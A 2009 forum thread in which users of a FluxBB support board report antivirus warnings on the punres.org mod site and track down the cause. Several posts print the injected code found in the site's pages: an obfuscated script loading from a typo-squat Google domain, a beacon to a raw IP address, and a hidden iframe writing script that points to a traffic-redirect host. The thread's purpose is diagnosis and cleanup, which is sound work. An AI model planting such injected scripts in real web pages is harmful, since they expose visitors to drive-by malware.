Punres.ORG infected with Malware?

joe.banana · 2009-08-07 16:57:57

Hello everyone,

Whenever I visit punres.org my AV pops up warning me of malware from this site.

Specifically HEUR/HTML.Malware and then SWF/Drop.Small.WC on Avira..

Anyone else getting troubles from the said site or this is just false alarm?

Reines · 2009-08-07 17:48:53

I wonder if it's anything to do with the rather weird looking:

<script type="text/javascript"><!--
document.write("<img src='http://208.88.226.75/log.php?id=3&r=" + Math.round(100000 * Math.random()) + "' alt=''/>");
--></script>

on each of their pages :s

Though SWF/Drop.Small.WC sounds like something trying to exploit an swf vulnerability, and I don't see anything like that there.

hcgtv · 2009-08-07 17:56:48

avast! has been going crazy on Punres for the last few days, I think it was a malicious ad that was causing the problem.

Smartys · 2009-08-07 20:49:43

Sounds like they got defaced.

Reines · 2009-08-07 22:32:36

There's some rather weird code on Punres too which looks like it's trying to do something undesirable.

<script type="text/javascript"> 
function advQuery(){
var Host="http://google.com/";
alert(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+unescape("%63%6F%6D")+"/if.php' type='text/javascript'%3E%3C/script%3E"));
};advQuery();</script>

It basically includes a js script (which seems to be down now) from

http://go00gle.com/if.php

joe.banana · 2009-08-08 16:36:09

So nobody is fixing it? It's been like that for almost a week now i think..

Last edited by joe.banana (2009-08-08 16:36:33)

Franz · 2009-08-08 16:43:26

That would be Kristoffer's task, I believe. You'd have to contact him.

Reines · 2009-08-08 18:19:54

joe.banana wrote:

So nobody is fixing it? It's been like that for almost a week now i think..

Punres isn't official and isn't run by us, you'd need to contact the owner of it.

Smartys · 2009-08-08 18:40:29

I sent him an email, I don't know if he'll respond/read it.

Smartys · 2009-08-10 20:35:38

He has responded and removed the offendending code.

joe.banana · 2009-08-13 17:24:48

Thanks for updating us! need some mods there

bgiddins · 2009-08-14 14:25:45

Punres is now down...

Kristoffer · 2009-08-14 20:03:39

And it probably will be a few days because everything went haywire when I was moving some stuff around. DreamHost is working on it, but I can't do much else.

Koos · 2009-09-21 16:31:09

Who's maintaining punres these days? The Boards Stats module and style previews have not been working for more than a month now. I tried to contact Kristoffer and StevenBullen about this but got no response. Another thing: Why doesn't the fluxbb site make mention of punres anywhere? The mods over there are compatible with fluxbb 1.2 after all.

StevenBullen · 2009-09-22 04:38:31

I will speak to him about getting the Stats/Style part either removed or updated. Probably removed.

Koos wrote:

Who's maintaining punres these days? The Boards Stats module and style previews have not been working for more than a
month now. I tried to contact Kristoffer and StevenBullen about this but got no response.

No one is maintaining it, if any problems occur then I can chase up Kristoffer.

Why did you not just raise a topic on PunRes as I check it every other day? Plus I just tested my blog contact button and that worked fine, also mailed myself on PunRes and that worked fine. So not sure how your message did not get to me.

Koos wrote:

Another thing: Why doesn't the fluxbb site make mention of punres anywhere? The mods over there are compatible with fluxbb 1.2 after all.

Compatible, yes. Good Quality, not all of them.

If you check out this particular post it will explain the 'mod repository' situation.
http://fluxbb.org/forums/post/25385/#p25385

Last edited by StevenBullen (2009-09-22 04:39:01)

Franz · 2009-09-29 19:00:53

Seems like they're still infected - or again.

StevenBullen · 2009-09-30 07:09:56

lie2815 wrote:

Seems like they're still infected - or again.

Any chance of some more information? like are you having the exact same problem as above?

Franz · 2009-09-30 09:34:16

No, I clicked on some link to a mod on PunRes and AVG popped up and warned me about a threat.

Nickrober · 2009-09-30 14:30:45

Here's what happens whenever I visit:

sirena · 2009-09-30 21:18:05

Yeah, look at the HTML souce for the punres.org home page:

<script src="http://www.query-google.com/urchin.php" type="text/javascript">
</script>

has been inserted just below the legitimate google-analytics.com code block for the site stats.

query-google.com points back to 82.146.52.145 which is hosted in the US but belongs to a Russian company ostensibly from Irkutsk.

That code shouldn't be there on punres.org.

Also note that the punres home page doesn't validate at W3C:

Sorry, I am unable to validate this document because on line 197 it contained one or more bytes that I cannot interpret as utf-8 (in other words, the bytes found are not valid values in the specified Character Encoding). Please check both the content of the file and the character encoding indication.
The error was: utf8 "\xD0" does not map to Unicode

StevenBullen · 2009-10-01 06:51:06

I will inform Jansson. Cheers sirena.

Reines · 2009-10-01 07:49:08

If this is the second time it's been infected it sounds like something running isn't up-to-date, or theres at least some underlying problem that needs fixed.

sirena · 2009-10-09 00:29:37

The malicious code is still at the bottom of the punres.org home page.

To recap, the problem code is this link at the bottom of the page:

 <script src="http://www.query-google.com/urchin.php" type="text/javascript">
</script>

That bogus urchin.php page contains the following Javascript code that invisibly writes an iframe:

document.write("<iframe src=\"http://www.step-traff.info/intraf.php?kod=954815&site=www.entervoid.com\" style=display:none></iframe>");

the code of which I expect varies from time to time.

Cyclone103 · 2009-11-15 15:52:30

My site was similarly infected once. Try placing <!-- before the closing body tag. When the JS injects itself, boom, commented out. It's a temporary fix to be sure, but it works.

Scripter · 2009-11-15 16:33:16

It was fixed today

Forums

#1 2009-08-07 16:57:57

Punres.ORG infected with Malware?

#2 2009-08-07 17:48:53

Re: Punres.ORG infected with Malware?

#3 2009-08-07 17:56:48

Re: Punres.ORG infected with Malware?

#4 2009-08-07 20:49:43

Re: Punres.ORG infected with Malware?

#5 2009-08-07 22:32:36

Re: Punres.ORG infected with Malware?

#6 2009-08-08 16:36:09

Re: Punres.ORG infected with Malware?

#7 2009-08-08 16:43:26

Re: Punres.ORG infected with Malware?

#8 2009-08-08 18:19:54

Re: Punres.ORG infected with Malware?

#9 2009-08-08 18:40:29

Re: Punres.ORG infected with Malware?

#10 2009-08-10 20:35:38

Re: Punres.ORG infected with Malware?

#11 2009-08-13 17:24:48

Re: Punres.ORG infected with Malware?

#12 2009-08-14 14:25:45

Re: Punres.ORG infected with Malware?

#13 2009-08-14 20:03:39

Re: Punres.ORG infected with Malware?

#14 2009-09-21 16:31:09

Re: Punres.ORG infected with Malware?

#15 2009-09-22 04:38:31

Re: Punres.ORG infected with Malware?

#16 2009-09-29 19:00:53

Re: Punres.ORG infected with Malware?

#17 2009-09-30 07:09:56

Re: Punres.ORG infected with Malware?

#18 2009-09-30 09:34:16

Re: Punres.ORG infected with Malware?

#19 2009-09-30 14:30:45

Re: Punres.ORG infected with Malware?

#20 2009-09-30 21:18:05

Re: Punres.ORG infected with Malware?

#21 2009-10-01 06:51:06

Re: Punres.ORG infected with Malware?

#22 2009-10-01 07:49:08

Re: Punres.ORG infected with Malware?

#23 2009-10-09 00:29:37

Re: Punres.ORG infected with Malware?

#24 2009-11-15 15:52:30

Re: Punres.ORG infected with Malware?

#25 2009-11-15 16:33:16

Re: Punres.ORG infected with Malware?

Board footer